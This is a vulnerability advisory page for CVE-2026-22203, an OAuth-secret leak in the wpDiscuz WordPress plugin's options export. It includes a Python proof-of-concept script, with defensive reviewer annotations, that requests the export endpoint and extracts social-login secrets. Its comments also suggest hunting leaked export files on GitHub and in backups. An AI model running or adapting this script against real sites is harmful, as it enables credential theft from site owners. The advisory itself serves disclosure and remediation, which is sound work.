Security Vulnerability Report
CVE-2026-22203 CVSS 4.9 MEDIUM

CVE-2026-22203

Published: 2026-03-13 19:54:11
Last Modified: 2026-03-17 20:23:48

Description

wpDiscuz before 7.6.47 contains an information disclosure vulnerability that allows administrators to inadvertently expose OAuth secrets by exporting plugin options as JSON. Attackers can obtain exported files containing plaintext API secrets like fbAppSecret, googleClientSecret, twitterAppSecret, and other social login credentials from support tickets, backups, or version control repositories.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:* - VULNERABLE
wpDiscuz < 7.6.47

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-22203 PoC - wpDiscuz OAuth Secret Extraction
# Target: WordPress site with wpDiscuz < 7.6.47
#
# Reviewer notes (defensive reading of this script):
# - The only network action is a single GET to the plugin's admin-ajax
#   export action; the response body is then scanned for five hard-coded
#   secret key names.
# - No credential is ever attached to the session: the --cookie argument is
#   parsed but never read, so the request is sent unauthenticated. The
#   author's own comment says the export needs an admin session, so on a
#   correctly configured site this request is not expected to return options.
# - verify=False on the request disables TLS certificate validation for the
#   connection; keep validation enabled wherever this is run.
# - The `json` import is unused.
# - Remediation per the advisory: update wpDiscuz to 7.6.47 or later; treat
#   any previously exported options file as containing live credentials.
import requests
import re
import json
import argparse


def exploit_wpdiscuz_oauth_leak(target_url: str) -> list[dict[str, object]]:
    """
    Exploit wpDiscuz options export feature to leak OAuth secrets

    Sends one GET to ``<target_url>/wp-admin/admin-ajax.php?action=
    wpdiscuz_export_options`` and scans the body for the five key names in
    ``sensitive_keys`` (fbAppSecret, googleClientSecret, twitterAppSecret,
    linkedinClientSecret, wordpressClientSecret).

    Args:
        target_url: Base URL of the WordPress site. Used verbatim as a URL
            prefix; no trailing-slash normalisation is done.

    Returns:
        A list of dicts with keys ``key_name``, ``value`` and ``platform``,
        one per key found. Empty when the response status is not 200 or
        none of the keys appear in the body.

    Raises:
        Connection/TLS errors from ``requests`` propagate; the bare
        ``except`` below only wraps the JSON-parsing branch.
    """
    # Step 1: Find wpDiscuz admin interface
    # NOTE(review): export_url is built but never used; the request below
    # goes to the admin-ajax endpoint instead.
    export_url = f"{target_url}/wp-admin/admin.php?page=wpdiscuz-options"
    # Step 2: Export options as JSON (requires admin auth)
    # This requires a valid admin session cookie
    # NOTE(review): nothing is ever added to this session (no cookies, no
    # auth header), so the request is sent unauthenticated.
    session = requests.Session()
    # Method 1: Direct export endpoint if available
    json_export_url = f"{target_url}/wp-admin/admin-ajax.php?action=wpdiscuz_export_options"
    headers = {
        # The script identifies itself; this UA string and the
        # action=wpdiscuz_export_options query parameter are usable
        # web-server-log indicators for export activity.
        "User-Agent": "Mozilla/5.0 (compatible; CVE-2026-22203-PoC)",
        "X-Requested-With": "XMLHttpRequest"
    }
    # Try to export options
    # NOTE(review): verify=False turns off certificate validation; any
    # credential later attached to this session would travel over an
    # unverified connection. The library default (verify=True) is the
    # right setting.
    response = session.get(json_export_url, headers=headers, verify=False)
    # Step 3: Parse exported JSON for OAuth secrets
    oauth_secrets = []
    sensitive_keys = ['fbAppSecret', 'googleClientSecret', 'twitterAppSecret', 'linkedinClientSecret', 'wordpressClientSecret']
    if response.status_code == 200:
        try:
            # Only a JSON object is really handled here. If the body decodes
            # to something else (array, string, number), `key in data` or
            # `data[key]` can raise TypeError, which the bare except below
            # silently turns into the regex fallback.
            data = response.json()
            for key in sensitive_keys:
                if key in data:
                    oauth_secrets.append({
                        "key_name": key,
                        # Raw JSON value, not necessarily a string.
                        "value": data[key],
                        # 'fbAppSecret' -> 'fb', 'googleClientSecret' -> 'google', ...
                        "platform": key.replace('ClientSecret', '').replace('AppSecret', '')
                    })
        except:
            # Try parsing as raw text
            # NOTE(review): a bare except also swallows KeyboardInterrupt and
            # SystemExit; the intended scope is the decode failure from
            # response.json(), i.e. `except ValueError:`.
            for key in sensitive_keys:
                if key in response.text:
                    # key is interpolated into the pattern unescaped; that is
                    # only safe because every entry in sensitive_keys is
                    # plain alphanumeric text.
                    match = re.search(rf'{key}["\s:]+([^",\s]+)', response.text)
                    if match:
                        oauth_secrets.append({
                            "key_name": key,
                            "value": match.group(1),
                            "platform": key.replace('ClientSecret', '').replace('AppSecret', '')
                        })
    return oauth_secrets


def check_github_exposure(cve_id: str) -> list:
    """
    Search GitHub for leaked OAuth secrets from wpDiscuz exports

    Stub: builds a code-search URL but never issues a request and always
    returns an empty list. Nothing in this file calls it.

    Args:
        cve_id: Interpolated into the (unused) search query string.

    Returns:
        Always ``[]``.
    """
    # NOTE(review): search_url is assigned and never used.
    search_url = f"https://api.github.com/search/code?q={cve_id}+wpdiscuz"
    # Note: Requires GitHub API token for rate limiting
    # This is for educational/security research purposes only
    return []


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2026-22203 wpDiscuz OAuth Secret Leak")
    parser.add_argument("-t", "--target", required=True, help="Target WordPress URL")
    # NOTE(review): accepted but never read -- args.cookie is not passed to
    # exploit_wpdiscuz_oauth_leak and the session it builds sends no cookie.
    parser.add_argument("-c", "--cookie", help="Admin session cookie")
    args = parser.parse_args()
    print(f"[*] Analyzing {args.target} for CVE-2026-22203")
    secrets = exploit_wpdiscuz_oauth_leak(args.target)
    if secrets:
        print("[!] OAuth secrets found:")
        # NOTE(review): secret values are echoed to stdout in plaintext, i.e.
        # into the same terminal/log/ticket channels the advisory warns about
        # as leak sources; redact or mask before sharing output.
        for secret in secrets:
            print(f" - {secret['platform']}: {secret['value']}")
    else:
        # A non-200 status and a 200 body without the key names are
        # indistinguishable here.
        print("[*] No exposed secrets found (or target not vulnerable)")
    # Note: This PoC requires admin authentication to exploit
    # Alternative attack vectors:
    # 1. Search GitHub for exposed JSON files containing OAuth secrets
    # 2. Check backup files in common locations
    # 3. Analyze leaked support tickets

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22203", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:10.580", "lastModified": "2026-03-17T20:23:48.140", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "wpDiscuz before 7.6.47 contains an information disclosure vulnerability that allows administrators to inadvertently expose OAuth secrets by exporting plugin options as JSON. Attackers can obtain exported files containing plaintext API secrets like fbAppSecret, googleClientSecret, twitterAppSecret, and other social login credentials from support tickets, backups, or version control repositories."}, {"lang": "es", "value": "wpDiscuz anterior a 7.6.47 contiene una vulnerabilidad de revelación de información que permite a los administradores exponer inadvertidamente secretos de OAuth al exportar las opciones del plugin como JSON. Los atacantes pueden obtener archivos exportados que contienen secretos de API en texto plano como fbAppSecret, googleClientSecret, twitterAppSecret y otras credenciales de inicio de sesión social de tickets de soporte, copias de seguridad o repositorios de control de versiones."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": 
"NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "7.6.47", "matchCriteriaId": "A81F51B9-0C21-4F7E-876B-C09A66B9AE05"}]}]}], "references": [{"url": "https://wordpress.org/plugins/wpdiscuz/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://wordpress.org/plugins/wpdiscuz/#developers", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/wpdiscuz-before-options-export-leaks-oauth-secrets-in-plaintext", "source": "[email protected]", "tags": ["Third 
Party Advisory"]}]}}